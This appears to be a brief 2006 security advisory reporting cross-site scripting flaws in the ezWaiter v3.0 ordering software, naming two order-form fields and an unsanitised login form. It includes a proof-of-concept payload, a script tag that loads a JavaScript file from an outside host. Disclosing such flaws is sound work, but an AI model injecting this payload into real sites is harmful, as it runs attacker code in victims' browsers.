Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13381
HistoryJul 02, 2006 - 12:00 a.m.

ezWaiter v3.0 - XSS

2006-07-0200:00:00
vulners.com
19

ezWaiter v3.0

Homepage:
http://www.ezwaiter.com/

Affected files:

Placing an order
login.php

XSS vuln when placing an order:

User input is not sanatized before being generated. For a PoC in the two boxes labeled
"Who is this item for?" and "Special Instructions:"

put:

<SCRIPT SRC=http://youfucktard.com/xss.js&gt;&lt;/SCRIPT&gt;

The login form found on login.php can be spoofed to remove the max char limits. It too doesn't
sanatize data.